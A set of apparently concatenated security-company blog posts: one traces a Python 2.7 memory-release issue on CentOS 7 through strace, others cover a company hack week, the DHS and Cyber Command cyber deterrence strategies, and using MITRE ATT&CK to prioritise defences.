When developing large-scale backend code, predicting system behavior from an application is crucial for engineers to build a more scalable and stable architecture. Unfortunately, high-level scripting languages tend to hide actual system behavior from developers, making troubleshooting, debugging, and scaling very difficult. Python is not an exception to this problem. Recently we had the chance to debug a memory-related problem with Python code. Just like many dynamically typed languages, Python comes with many convenient features, including automatic garbage collection, so developers can focus on writing business logic. However, simply relying on correctness of business logic can sometimes obscure problems that happen at lower levels.

In this blog, I explore our team’s debugging efforts that led to the discovery of an unpatched memory problem in Python 2.7 that was shipped with RHEL/CentOS 7.3. While new development employs Python 3, Python 2.7 with RHEL/CentOS 7 remains a popular technology stack widely trusted by many enterprise customers. This case study is also indicative of Endgame’s approach to bug discovery and disclosure, the challenges we encounter, and solutions we apply when integrating open libraries within our own software development process, including our migration to Go.

Background

As part of the engineering backend team we constantly process hundreds of thousands of messages, and face operational constraints that demand high precision on scale, speed, and scope. Last year, we received an incident report stating that requests were not being properly processed. Most Linux distros maintain comprehensive logs, usually under /var/log directory with different filenames to distinguish different components. This is usually a good place to start for debugging, because it provides comprehensive information on the state of the overall system.

From the log files, we found an interesting hint that indicates that our Python process was killed by the kernel’s Out Of Memory manager. The kernel log showed something similar to the output below:

[230026.780153] [55149]  1000 55149  1155060     1206     111      211             0 postmaster
[230026.780155] [62104]  1000 62104  1155060     1204     111      211             0 postmaster
[230026.780158] [66951]  1000 66951  1155060     1212     111      211             0 postmaster
[230026.780162] Out of memory: Kill process 125331 (python) score 681 or sacrifice child

The Out Of Memory manager is a Linux kernel’s component. It maintains a “badness score” for each process and then terminates a process if the score goes relatively high. The heuristic to determine the badness is associated with original memory size of the process, CPU time, runtime, with some kernel internal adjustment. In the end, the more memory the process uses, the higher the score. This prevents the entire system from crashing because of insufficient remaining memory space for the kernel.

Further tracing of logs showed that the process id matched a Python process that runs database queries using an Object-Relational Mapping library. Why was our Python code selected to be killed? Did we have any bad queries that loaded too much information on process memory? Do any of the libraries we use have a memory leak? We needed to analyze this problem step by step.

Validating SQL

ORM frameworks are frequently used because they provide convenient ways to write applications that interact with databases without involving SQL, resulting in less context switching for our engineers, faster development speed, and more readable code. ORM does this by generating SQL on behalf of developers, providing an additional abstraction layer. However, ORM may not always conduct the exact query that the developer intended. It may fetch more information from the database or it may run more queries than needed. These often make debugging more difficult for engineers.

Fortunately, most ORM libraries provide methods that show actual SQL queries that are run on the Relational Database Management System (RDMS). Even without such features, most RDMSs offer features to log statements on the server side. Because what the database sees is more important, we extracted SQL statements from the database server and validated that the query was constructed and executed as intended.

Python code

result = session.query(Task).filter_by(account_id=account_id, ready=True).all()

Actual Query on observed on server side

< 2017-12-09 00:22:32.283 UTC >LOG:  statement: SELECT tasks.task_id AS tasks_task_id, tasks.account_id AS tasks_account_id, tasks.user_id AS tasks_user_id
        FROM tasks
        WHERE tasks.account_id = '####' AND tasks.ready = 'true'

The generated query looks as expected. If our query matches expectations, then the problem must be located at a lower layer, so we moved on to the next step, which is tracing our code using Python Debugger (pdb).

Python Debugger

Python comes with a handy debugger. If the source code is accessible, the simplest way to run the debugger is to import the pdb module and then add a line ‘pdb.set_trace()’ above the breakpoint. From here, each function call can be explored. Even better, one can import additional modules that may be helpful with debugging. Because we are interested in memory usage of code, we measure the memory usage using top. Among many metric top reports, we are interested in the “resident memory” column (RES), which reflects the amount of memory being used. With one terminal running the debugger and another running top, we are ready for memory analysis.

Stepping through each line of the code while observing resident memory size, we trace the code to the section where our process allocates some space to hold the database query results. Since the Python runtime handles garbage collection, we expected the space allocated from ORM query to return memory back to the operating system when the variables go out of scope.

However, even with the variable out of scope, the process still didn't free up the memory. Memory usage was still above several GB. Did our library have a memory leak? After quickly Googling for any known memory leak and stepping through the library code, we didn’t find any obvious indication of a memory leak.

Did our code still hold references to objects? Most garbage collectors work by using reference counting mechanisms. The runtime keeps a count of references to each object created and then periodically checks if there is an object with 0 reference count. If so, the runtime deletes the object and returns the memory space back to the operating system. This is convenient because engineers do not need to oversee memory management themselves; the system will take care of it. However, that also means that the space won’t be freed until all references to the object are discarded. If any code or library still holds references to the objects without revealing it does, the space won’t be cleaned by garbage collector. This can be checked quickly by running the get_count() function of gc module before and after our code snippet. We did not see any evidence of additional references being created.

We next explored the possibility of our debugging session influencing the timing of the garbage collection. Based on how the code read and how Python dynamically cleans up the memory, it seemed like the memory space was released. To confirm we solved the memory problem, we tried triggering garbage collection manually by running the Garbage Collector Interface. However, it didn’t help. The resident memory usage stayed above several GB.

Next, we removed third-party library code from our logic to eliminate variables that may distract from identifying the root cause and see if the symptom persisted. We stripped out third-party libraries as much as possible without changing the original logic in the code. Indeed, we were able to reproduce the same symptom without importing third-party library calls, just purely from business logic.

At this point, we realized that it was not the logic of our application, nor the library code. Something else was happening, so we decided to inspect system calls.

Isolating problems

When inspecting system calls, it is important to eliminate as much noise as possible. Because system call tracing on high level languages generates lots of noise, we created the bare minimal code that reproduced the same symptom. This can be achieved by focusing on the section of the suspicious code and repeatedly eliminating lines that do not change the behavior of the core section. Here’s a simplified version of the code snippet:

Note: Be careful. The following code may eat 1.5 GB of your memory!

1  import gc
2  import pdb
3  d = [ {‘EndgameRules’: 1} for x in xrange(10000000)]
4  pdb.set_trace()
5  del d
6  gc.collect()
7  # we need to pause here

Here, we construct a list of small objects, in this case dictionaries containing only one item. This is typically what the ORM library does. When we select a certain record using ORM, it constructs a list of small objects containing data from table columns. The only reason that we generate large lists is to make the memory increase more noticeable since small changes in memory are more difficult to identify. Using this code we reproduce the resident memory usage above 1.5 GB. In this case, we intentionally executed gc.collect(). Most Python developers would agree that the memory allocated in line 3 should be returned to the system at line 5. However in reality, the memory usage still remains in line 5. Even after we trigger garbage collection, the memory usage remains high. Let’s take out gc and pdb module from our code snippet and observe the system calls it generates.

Deeper Dive

We already checked whether we could reproduce this problem on versions of Python greater than 2.7.6 and noticed a difference. The next step was to figure out what was causing the difference. We compared system calls on this snippet to see how they differ on Python 2.7.6 CentOS 7 and Python 2.7.12 on Ubuntu 16.04. Strace is an awesome utility that can be used for system call analysis. The easiest way to run strace is to execute strace on the command line interface followed by the actual command one wants to trace. It is usually a good idea to redirect the output to a file, as the output of strace is usually very long. For us, it is strace python python_code.py > strace_output.txt.

The following sample code creates and deletes a list of Python dictionaries.

a = [ {"EndgameRules": x} for x in xrange(5000000)]
del a

Strace output for Python 2.7.6 on CentOS 7.3

munmap(0x7f0b2c39e000, 8192)            = 0
brk(NULL)                               = 0x1f2e000
brk(0x1f4f000)                          = 0x1f4f000
brk(NULL)                               = 0x1f4f000
brk(0x1f70000)                          = 0x1f70000
brk(NULL)                               = 0x1f70000
brk(0x1f91000)                          = 0x1f91000
brk(NULL)                               = 0x1f91000
brk(0x1fb2000)                          = 0x1fb2000
brk(NULL)                               = 0x1fb2000
brk(0x1fd4000)                          = 0x1fd4000
… Truncated …
brk(NULL)                               = 0x5e664000
brk(0x5e685000)                         = 0x5e685000
munmap(0x7f814c1a8000, 40218624)        = 0
rt_sigaction(SIGINT, {SIG_DFL, [], SA_RESTORER, 0x7f8156d695e0}, {0x7f815708c540, [], SA_RESTORER, 0x7f8156d695e0}, 8) = 0
brk(NULL)                               = 0x5e685000
brk(NULL)                               = 0x5e685000
brk(0x1404000)                          = 0x1404000
brk(NULL)                               = 0x1404000
exit_group(0)                           = ?
+++ exited with 0 +++

Strace output for Python 2.7.12 on Ubuntu 16.04

mmap(NULL, 262144, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb7ac821000
mmap(NULL, 262144, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb7ac7e1000
mmap(NULL, 262144, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb7ac7a1000
mmap(NULL, 262144, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb7ac761000
mmap(NULL, 262144, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb7ac721000
mmap(NULL, 262144, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb7ac6e1000
… Truncated …
munmap(0x7f913380c000, 262144)          = 0
munmap(0x7f913384c000, 262144)          = 0
munmap(0x7f913388c000, 262144)          = 0
munmap(0x7f91338cc000, 262144)          = 0
munmap(0x7f913390c000, 262144)          = 0
munmap(0x7f913394c000, 262144)          = 0
munmap(0x7f913398c000, 262144)          = 0
munmap(0x7f91339cc000, 262144)          = 0
munmap(0x7f90e0d21000, 40218624)        = 0
rt_sigaction(SIGINT, {SIG_DFL, [], SA_RESTORER, 0x7f91349e9390}, {0x534a20, [], SA_RESTORER, 0x7f91349e9390}, 8) = 0
brk(0x162e000)                          = 0x162e000
munmap(0x7f90d9aa1000, 262144)          = 0
exit_group(0)                           = ?
+++ exited with 0 +++

Notice that we see more brk() calls in Python 2.7.6 and more mmap() calls in Python 2.7.12. mmap() is a well-known system call that “creates a new mapping in the virtual address space of the calling process.”

But what is brk()? According to the Linux man page, “brk() changes the location of the program break… Increasing the program break has the effect of allocating memory to the process; decreasing the break deallocates memory.” Strace output of Python 2.7.6 shows that the process increases the program break, but never decreases it even after ‘del a’ statement is executed. We do see a tiny release of 40 MB with munmap, but Python 2.7.6 has not returned the big chunk that was allocated with the brk() call.

Python 2.7.12, on the other hand, uses mmap() to allocate memory. The allocated memory is cleaned upon ‘del a’ with munmap() calls, returning most of its memory back to the OS. This is expected behavior. So why the discrepancy?

Why the Difference?

Python 2.7.6 was released in Nov 2013. This bug is actually not new and was referenced initially in reports which were followed by patches and referenced in Python’s documentation.

There was a change in the arena allocator in version 2.7.7 to use mmap() if available. Arena allocator is used for objects smaller than 512 bytes in Python and uses memory mapping called arenas with a fixed size of 256 KiB.

From this documentation, we also validated that this only becomes a big problem when a process expands Arena space by generating many small objects under 512 bytes. This happens commonly with code utilizing an ORM.

This behavior is not a memory leak. Python’s runtime will reuse all of the expanded space when it needs to hold other objects if they are not occupied. However, no other process on the same system can use the memory even if Python decides not to use those spaces. To use an analogy, the runtime behaves like a kid who won’t share toys after using them. That means if a user creates a long running job, such as a web service that happens to allocate many objects under 512 bytes, the memory won’t be returned to the system until the Python process terminates.

To work around this problem, keep Arena space under control by limiting the number of small objects Python uses to create an object list. For example, fetch fewer rows from the database by being more strict on the query filter. However, even with this proper measure, predicting this problem is not easy because it is not easy to observe this behavior from Python code that fetches data using an ORM.

We only saw the bug in Python 2.7 that was shipped with RHEL/CentOS 7.3. Python 2.7.7 or later available on Ubuntu 17.04. Macs do not have this problem as they use later releases. We disclosed this bug to Redhat and the vendor addressed the bug in the RHEL 7.5 release. We appreciate this patch and hope this example highlights our approach to debugging, some of the key decisions to make, and the challenges of writing a scalable application.

Conclusion

Thanks to dynamically typed languages and third-party libraries, engineers can easily build something quickly and implement their ideas without as many obstacles. However, dynamically typed languages combined with lots of libraries introduces too much abstraction that doesn’t necessarily make computers behave as expected from the source code. When building an application that processes a lot of data in parallel, correctness of our mental model is crucial. Application code reflects engineers’ mental models, and if the system does not abide by this model, then it can lead to countless hours spent debugging.

Knowing this, we have migrated most of our components that require high performance and scalability away from Python and into Go. Go’s runtime still provides some level of abstraction, but we find it more efficient, straight forward, and less unexpected or surprising. For the most part, a process implemented in Go behaves according to how it is written. We still use Python when appropriate: writing quick prototypes, small tool development, or small scale work. But new projects will most likely be written in Go.

If you find yourself relying on dynamically typed language and third-party libraries, you should ask yourself if there is any magical behavior or convenience feature that would lead the system to behave differently than expected in your mental model. This gap may be difficult to identify until there is a problem. In the case of the Python bug, we didn’t recognize the deviation from our mental model until it came to our attention that requests weren’t being processed as intended. To ensure our systems behave as intended, we constantly seek ways to limit abstraction and gain efficiencies. While learning a new language such as Go may seem like additional work, we believe it has helped us increase our reliability and productivity, while limiting our time spent debugging through layers of abstraction.

Earlier this year, Endgame hosted its annual all-hands meeting, bringing together our team from across the country for internal discussions, technical talks, and social events. This was followed by our hack week, where individuals submitted proposals, built teams, learned new skills and tackled projects together focusing on product features and workflow optimization. This year’s hack week was our most successful to date both for the solutions developed and the knowledge shared, as well as its lasting impact on encouraging cross-team collaboration and an innovative culture. Taking time away from the day-to-day pressures and deadlines may seem like a luxury, but we view it as a necessity with both business value and as a means to ensure we maintain an innovative culture and cutting-edge team as we grow. This year, we organized our hack week with a few underlying objectives in mind. I’ll walk through my perspective on the essential role of hack week for our team, and highlight some of the projects and value add to the broader team.

Cultural Significance

When organizing this year’s hack week, we had a few core objectives. These can be bucketed into people, processes, and technology. Starting with technology, we wanted to empower engineers and researchers with an opportunity for greater autonomy to choose a specific problem and develop their own solutions. We want to stay on top of the latest technologies, learn new languages, and take risks that might stray from our product roadmap. As all developers can relate, we sometimes have important tech-debt items that we want to fix but just need the time. Hack week provides this opportunity to create innovative solutions to important technical problems we face every day.

Most of the year, guidance on features and priorities comes (understandably) from product management. In contrast, hack week allows the team to focus on those advances that are directly relevant to our platform, without looking for space on the latest product roadmap. Hack week offers engineers and researchers the responsibility to propose, choose, and justify their projects, which may be outside of the immediate roadmap, customer requests, or bugs. This is one of the most liberating aspects of hack week, as it emphasizes and encourages the autonomy to independently develop proposals, collaborate with different team members, and test or learn new skills. Engineers and researchers are up-to-date on advances in malware methods and prevention techniques, and so our team keeps a list of topics and small experiments they want to try to maximize impact. For example, one team worked to stretch Endgame’s HA-CFI protection to new platforms that are difficult to monitor and detect on. If the teams are successful, these outcomes will most likely be incorporated in the next few releases of the product.

Finally, it is not simply lip service to highlight the essential role of culture in building a great company and an industry-changing product. We take this very seriously and view it as a core competitive advantage. Hack week provides a unique opportunity for collaboration between people who ordinarily don’t work together. Our team is comprised of engineers, testers, user experience, site reliability engineers, and researchers with diverse backgrounds and unique experiences from their past lives in private industry, consulting, military, and government security. Hack week is where lots of that energy and experience converge to build cool new features and share skills that will give Endgame an advantage over the competition.

Highlights

Let’s take a look at some of this year’s projects to illustrate the range of projects and the big swings taken. In general, although individuals had a few weeks to brainstorm ideas and build teams, realistically most development took place over a 48 hour period. Projects addressed a range of new features or challenges, including expanding various UX, data science and tradecraft analytics. Two of these projects are described below.

At Endgame, we understand that our product will be judged by how quickly and easily we can triage problems and stop attacks. With that in mind, the team below built SMP Health, a monitoring console for our Management Platform. We have been using tools like New Relic and Splunk for monitoring, but they only loosely match our needs. This new tool pulls out precisely the performance characteristics and resource consumptions of the services we care about the most. This tool will help developers, scale engineers, and customer support. Importantly, it also offered a team member the opportunity to learn the Go language (for more on our move to Go, check out our blog on debugging Python and why this would not be needed after switching to Golang).

Chan and Nayarra of the SMP Health Team

In another project, the Streamline Models team re-vamped a slow, expensive, and labor-intensive process of generating malware machine learning (ML) models. They cut the time and expense dramatically by ruthlessly automating our malware research and development processes. We can now develop ML models faster and apply them to more problems, such as macOS malware, macros, or PDFs. This will help Endgame improve detection and prevention rates, and become even more responsive to false positives experienced by our customers.

Our Streamline Models team, comprised of data scientists, frontend engineers, and site reliability engineers

Back to Business?

One of the biggest misperceptions about hack week is that it can turn into a boondoggle, where engineers and researchers spend a week building novelty projects with no business value. Of course, without oversight and good planning, this can occur. However, from the beginning we invited corporate leadership into the planning process, into the proposal reviews, and they were part of our Shark Tank-style judging and awards ceremony at the end of the week. Bridging the gap between corporate leadership and our engineers and researchers proved essential to the success of hack week, and ensured our goals were achieved. Rather than being viewed as a break from business as usual, hack week directly supports business imperatives while advancing innovation and enhancing our culture.

Corporate leadership participated in judging the final projects that were presented to the entire company

In short, our 2018 hack week exceeded our expectations and raised the bar for future hack weeks. For others thinking about implementing a hack week, there are a few key takeaways. Focus on short, experimental projects that the team will attempt to prove as viable. Encourage taking risks and failing fast. Encourage collaboration between people who ordinarily don’t work together. Share Skills. Bring the whole company into the process for broader support and impact. We learned a lot throughout hack week, and look forward to building upon this momentum and the new connections, capabilities, and skills gained throughout the week.

Almost a year to the date after the White House cybersecurity executive order, the Department of Homeland Security (DHS) last week released a new Cybersecurity Strategy. The DHS strategy reinforces its role as the key authority for defending and preventing cyber attacks within the United States, noting the ten-fold increase of cyber incidents reported on federal systems between 2006-2015 and the need for building a resilient cybersecurity ecosystem.

The DHS Strategy follows the March release of the Command Vision for US Cyber Command, which outlines the new Unified Combatant Command’s objective to, “Achieve and maintain superiority in the cyberspace domain to influence adversary behavior, deliver strategic and operational advantages for the Joint Force, and defend and advance our national interests.” The Vision outlines the aim to achieve superiority in cyberspace through persistence, defending forward, and engaging adversaries.

Together, these two strategic documents touch upon two major aspects of deterrence – deterrence by denial and deterrence by punishment. With the release of a national strategy on cyber deterrence delayed in the National Security Council, these two documents may add insight into what may emerge in the new strategy, while also revealing some of the many remaining challenges. Importantly, they demonstrate the necessity for and challenges with reimagining deterrence for the digital age, which requires a whole of society approach and better defined parameters for what to deter in the first place.

Reimagining Deterrence

Deterrence is a strategy to dissuade or prevent adversaries from taking specific actions. Most deterrence frameworks are based on nuclear deterrence and Cold War dynamics, and are ill-equipped to handle the nuances of the cyber domain. As both the DHS and Cyber Command strategies highlight, the bipolar international system of the Cold War no longer exists, and has been replaced with several near peer adversaries, criminal groups, mercenaries, terrorist organizations and lone wolves who can access open source nation-state cyber capabilities. The asymmetric nature of cyberspace shifts the fundamentals of power, misperception and misattribution are heightened and of course all of the challenges of nuclear proliferation and traditional kinetic attacks still exist. Moreover, while nuclear deterrence focuses on deterring nuclear attacks, the parameters for cyber deterrence remain ambiguous. Is it based on preventing certain effects, such as critical infrastructure destruction? Preventing certain kinds of malicious activity, such as cryptojacking or ransomware attacks?

While the parameters remain nebulous, there has been some progress in strategic deterrence that integrates the cyber domain. Joseph Nye recently specified four key mechanisms for deterrence: denial, punishment, entanglement, and norms. The DHS and Cyber Command strategic documents address these first two mechanisms, while referencing entanglement and norms as well, and are worth exploring.

Deterrence by Denial

The DHS strategy details a risk management approach, and in many regards resembles those cyber risk management models increasingly adopted in the private sector. For instance, Pillar 1 focuses on risk reduction, and includes a range of focal areas including maximizing investments, protection for both legacy systems and cloud and shared infrastructure, and reducing risk while maximizing investments. Part of the risk management also includes the desire to, “increasingly leverage field personnel…to encourage the adoption of cybersecurity risk management best practices.” This is referenced in the context of protecting critical infrastructure, and will be interesting to watch whether this leads to new private-public sector collaboration frameworks. The risk management approach is echoed in the Department of Energy’s recent cybersecurity plan, and together may signal broader government action toward minimizing risks and optimizing outcomes.

In addition to risk management, the DHS strategy emphasizes resilience, execution, and a complex systems approach that integrates the human and technical aspects of cybersecurity. Importantly, by focusing on building resilience within an ecosystem, the DHS strategy integrates the human and technical aspects of cybersecurity, while taking steps to address better coordination between the private and public sector. In focusing on the cyber ecosystem, the DHS Strategy inherently frames defenses based on a socio-technical system. This helps pull various aspects of deterrence by denial under one umbrella, including expanding the workforce, capacity building, and incident response, in addition to the technological research and development required to strengthen defenses.

Deterrence by Punishment

Cyber Command’s Vision similarly stresses the role of resilience but, given their new authorities and mission, takes an approach focused more on gaining superiority through persistence and active engagement. While the Vision does not emphasize traditional perspectives on deterrence, several aspects do imply deterrence by punishment and impacting the risk calculus of adversaries. In defining cyberspace superiority, the Vision not only focuses on the need for fully functioning cyber operations, but also the security of land, air, maritime, and space forces as well. This is a welcome departure from dominant discussions that treat the cyber domain as a silo and ignore the cross-domain effects. This is a growing trend, as the recent Nuclear Posture Review (NPR) integrates cross-domain deterrence by punishment. The NPR specifies that the U.S. will only consider employing a nuclear response under extreme circumstances, which may include “significant non-nuclear strategic attacks” on the U.S. or allies, which may reference a destructive cyber attack.

The Vision also takes a broader perspective on how adversaries are exploiting cyberspace for their objectives. For instance, it notes, “Cyberspace capabilities are key to identifying and disrupting adversaries’ information operations.” This is closely linked to Imperative 3 and the push toward integrating cyberspace operations with information operations, acknowledging the full-spectrum of potentially malicious behavior in cyberspace to which the U.S will respond. The Vision reiterates a seamless transition between offense and defense, and defending forward as much as possible to cause adversaries to shift to defense and holding them accountable for cyber-attacks. Finally, the Vision focuses on achieving an overmatch of capabilities, which again impacts the risk calculus of adversaries and informs deterrence.

Overcoming Failures of Imagination

“We must anticipate the changes that future technological innovation will bring, ensure long-term preparedness, and prevent a “failure of imagination.” DHS Strategy

“Anticipate and identify technological changes, and exploit and operationalize emerging technologies and disruptive innovations faster and more effectively than our adversaries.” Cyber Command Vision

Authoritarian regimes and malicious non-state actors continue to creatively leverage all facets of the cyber domain to achieve a range of objectives with little gap between technology and policy. Both the DHS Strategy and Cyber Command Vision note that the U.S. gap between policy and technology must also close through anticipating, integrating, and preparing for technological change. To that end, each strategic document takes steps toward preventing strategic surprise. This includes research and development across all phases of operations, and international collaboration and partnerships. Each document also notes the necessity for shaping acceptable behavior in cyberspace, and references deterrence through the establishment of norms.

That leaves deterrence by entanglement, which is where the private sector plays a unique, unparalleled role compared to the other domains, and is rarely discussed when it comes to deterrence. Within the Cyber Command Vision, the emphasis is on leveraging the talents, products and expertise of the private sector for information sharing and capability development. The DHS Strategy similarly focuses on expanding collaboration and strengthening partnerships with the private sector. Each of these is important, especially as private sector initiatives such as the Tech Accord and Charter of Trust aim to protect the resilience, security, and privacy of cyberspace. The private sector is key to entanglement (and denial) as the owner of much of the data and infrastructure, and due to its role in cross-national economic interdependence and reliance on the Internet as a key mechanism for economic growth. This aspect of deterrence is especially relevant for US-China relations, but also applies to relatively isolated countries as well.

Finally, in the effort to better prepare for and prevent surprise, it is absolutely necessary to innovate strategic thinking when it comes to cyber deterrence. First, much greater refinement is required to identify what behavior the strategy is intending to deter, and how to progress from strategy to action. Both documents note that not all malicious activity will be deterred. With everything from information operations to wiper attacks to phishing campaigns falling under the umbrella of malicious cyber activity, targeted deterrence is required to then tailor and prioritize deterrence strategies against the most impactful kinds of malicious cyber activity. The recently introduced DETER Act takes steps in this direction, moving away from a one-size-fits-all approach and instead mandates distinct action plans based on the effect and the attacker. Second, cybersecurity strategies must be creative and innovate to promote the most impactful aspects of U.S. soft power: democratic norms and civil liberties. Both the DHS and Cyber Command documents acknowledge this, emphasizing the necessity to pursue these strategies in “ways consistent with our national values and that protect privacy and civil liberties.” This is an absolutely essential component to innovation, public-private relationships, and serves as a cornerstone to U.S. soft power. However, as is common in strategic documents, it is not clear how each organization will achieve this balance, or what steps will be taken in many of other areas as well. While the strategic documents take much needed steps toward informing a broader national cybersecurity strategy, they should be monitored to see if and how they are translated from strategy to action.

Twenty years ago a group of infosec experts testified to Congress on the fragility of digital security. To commemorate that testimony, they returned to Capitol Hill last week with a similar conclusion. Over the last twenty years, digital security has not advanced beyond incremental changes, and is even more complex and insecure given the greater scale and diversity of devices. A complete rethinking of defense is necessary and technology alone will not solve this problem. It requires a re-evaluation of security programs and crafting defenses in a new way built off an open and evolving attack model.

MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) framework addresses many of the core challenges enterprises face today. First, ATT&CK provides the most comprehensive model of modern attacker behavior. This framework can directly inform defensive and gap assessments, allowing organizations to intelligently prioritize areas for additional data collection, analysis, and detection. When operationalized, the framework moves organizations from reactive to proactive postures. Second, ATT&CK helps bridge the gap between practitioners and executives, enabling leadership to make more informed risk management and resource allocation decisions. Each of these will be discussed in turn, but first let’s take a quick look at how security arrived at the current quagmire, followed by how to operationalize the ATT&CK Matrix. With the move to this new framework, organizations can innovate all aspects of enterprise defense, and better prioritize and tailor resource allocation based upon their own unique threat model.

Why Current Strategies Are Not Working

Organizations cannot easily identify true gaps in their defenses due to a patchwork of one-off solutions and outdated threat models built upon a high-level view of the world, lacking the depth needed to properly describe today’s attacks. These older models either attempt to summarize the threat to the point of oversimplification, or focus too heavily on the early pre-compromise stages of the attack (i.e., exploitation and initial malware infection). This, in turn, makes it extremely difficult for security teams to understand where to spend the next dollar of funding, and for executives to explain to their boards the breadth and effectiveness of their defenses. Blind spots persist in security assessments, significantly impacting the full range of defense considerations including both resource allocation and detection.

These problems are confounded thanks to the word-salad of buzzwords that tries to catch a buyer’s eye, but lacks any substance to help buyers make more informed decisions. Assessments similarly can lead to confusion, given the inconsistencies of metrics, models, and self-evaluation. Even product purchase evaluations (i.e., proof of concepts) are often not as informative as they should be. Based on evaluations I’ve observed over the years, they tend to be more generic than tailored, and rarely dive into the depth of problems customers encounter. The product may test well based on a generic framework, but the top risks for specific organizations may not be addressed due to the metrics used and lack of transparency, and customers may even purchase products that lead to redundancy of defenses instead of addressing the real risks.

You Say You Want a Revolution

It’s time to progress beyond the decades of incremental changes in defenses. We need revolution, not evolution. To leapfrog, we need to understand adversary behavior: where they have gone and where they may go in the future. Fortunately, there’s a framework that does just this - MITRE’s ATT&CK Matrix.

MITRE is a U.S. not-for-profit organization managing federally funded research and development centers (FFRDCs), making them an impartial, respected, and knowledgeable voice. They have developed and help maintain the ATT&CK Matrix. According to MITRE, "ATT&CK for Enterprise is an adversary behavior model that describes the actions an adversary may take to compromise and operate within an enterprise network." Security teams that assess and validate their visibility and protection across the range of behaviors in the Matrix are those best equipped to defend against today's threats.

The ATT&CK Matrix may seem overwhelming at first glance given its coverage of hundreds of techniques and tactics (see Figure 1). The good news is full coverage is not needed to make a significant improvement to your security program. The best place to start is to learn from history. Identify those groups who have previously targeted your corporate ecosystem (e.g., parent company, supply chain, industry). With this knowledge you can begin to prioritize your ATT&CK coverage against previously observed attacks. If you do not know where to begin, MITRE’s Groups page provides an overview of attack groups and the industries they frequently target.

Figure 1: A Partial Screenshot of MITRE’s ATT&CK Matrix

MITRE also offers a free open-source tool called Navigator to help organizations understand what areas of the Matrix should be prioritized. You can select a threat group or a malicious software kit and Navigator will highlight the tactics on the ATT&CK Matrix previously utilized by that group. For example, selecting APT29 reduces the focus from over 280 individual techniques (cells in the Matrix) to just 22. This number is far easier to digest as a security team, and a plan of action can be made to ensure those areas are covered. Advanced and well-resourced teams can dive deeper, analyzing data availability and detection capabilities for larger chunks of the Matrix and formulating plans to close gaps in response.

Aligning security priorities to ATT&CK doesn't need to be an all or nothing proposition. Even without the people in place to immediately act on the data gathered during the prioritization, the ATT&CK Matrix could still save millions in damages by reducing the time for an external incident response team to contain an attack. The visibility gained through ATT&CK can be a vital addition to an incident response plan. If you were notified of a breach today an external team would have to start from scratch: deploying their security stack, gathering data, and trying to stop the bleeding. Imagine instead if you can direct them to your data lake filled with critical information covering the depth of ATT&CK. They can immediately begin to detect and stop the adversary, greatly reducing the time to containment and stemming damage and loss.

Trust But Verify

With this new list of prioritized ATT&CK techniques to assess, organizations can ask security vendors to demonstrate their protections against these prioritized tactics and behaviors. Do not accept a binary “protected” or “not protected”; depth and transparency is the goal in this exercise. Only by truly understanding your gaps can you begin to build your revolutionary security operation center. With the vendors’ lists in hand, now it is time to verify their claims. There are a few good free tools for testing your coverage against ATT&CK, including a free and open-source project developed by Endgame called Red Team Automation (RTA). RTA facilitates testing security stacks against ATT&CK techniques without having to detonate nation-state malware in your production environment. Dozens of scripts are available to test coverage against the prioritized list of techniques developed in the previous section.

By reducing the entire Matrix to a prioritized list of techniques used by previously observed threats, understanding your perceived coverage through visibility gap analysis informed in part or entirely by detailed reports of coverage from your vendors, and validating your coverage with free tools like Endgame RTA, you are now in a position of power. You know exactly where to focus your security program. Do you have complete gaps in the technique list? Look for (and test) technology that provides visibility, protection, or both on those cells in the Matrix. Do you have data, but lack the ability to proactively analyze the information? You may need more security analysts or better automation and security tooling. The information gleaned using the ATT&CK Matrix can inform updates to security roadmaps in a far more detailed way than saying “we need next-gen AV”.

Communicating Up

An attack model also helps quantify the success of the security team. Fewer alerts, fewer incidents, and less damage and loss are the result of a mature security organization. This leads to a challenge, though, when talking to leadership about budgeting for more security products and more people. The challenge is often in proving the negative. A security team needs to demonstrate that the absence of a breach is due to the successful defense posture of the security program, not because of a lack of attempted attacks. A huge benefit of adopting an attack model is that is provides a way to show increasing value through coverage. Teams can begin to report the increase in coverage of the ATT&CK Matrix as an indicator of security effectiveness. A strong case for analysts or technology can be made when there are gaps in the Matrix, and validation can occur when the organization increases its percentage of coverage.

Roberto Rodriguez, an adversary researcher at Specter Ops, has a very well-written blog describing a scaled model for assessing ATT&CK coverage as well as some open-source tools to help develop this mapping. In his blog post, he describes a great way to report the upward trend of coverage (Figure 2). Tools like these serve an essential role to help identify gaps in coverage while facilitating executive level discussions about the various aspects of a security program and coverage.

Figure 2: Roberto Rodriguez’s Upward Trend Based on ATT&CK Matrix Coverage

What’s Next

With the ATT&CK framework in hand, organizations gain a range of security benefits. I’ve already addressed the value for executive decision making and communication, as well as the holistic coverage, but the ATT&CK framework enables so much more. Organizations can begin to optimize other aspects of their security program as well. For instance, ATT&CK helps organizations move from reactive to proactive defense postures. By gaining visibility and protection across the threat groups known to have attacked the corporate ecosystem, security teams can set their sights more broadly. They can look at attacks against other verticals which may target them in the future and expand defenses against other cells in the ATT&CK matrix. This can also enable threat hunters to have tactical focus in these areas, honing in on those gaps until coverage is in place. This saves time and creates efficiencies.

In addition, ATT&CK augments purple teaming by using red team exercises to not only find unknown security gaps, but also to verify defenses. The red team focus on previously proven behaviors strengthens the security posture and facilitates maintenance, while blue teams are able to ensure they have the processes and protections in place and up to date to cover these attacker techniques.

Because MITRE also updates the framework with feedback from the community, it is well situated to remain on top of the latest adversarial behavior and to continue to provide benefits as adversarial behavior changes. At Endgame, we have fully embraced the ATT&CK framework and believe it best reflects the constantly and rapidly changing threat environment. Our coverage is directly tied to MITRE ATT&CK behavioral tactics and techniques, our alerts link to MITRE’s Wiki for analyst training and reference, and we contribute back to MITRE. For more information on how Endgame can help you outpace the adversary by embracing MITRE ATT&CK as a core protection strategy, contact us info@endgame.com.

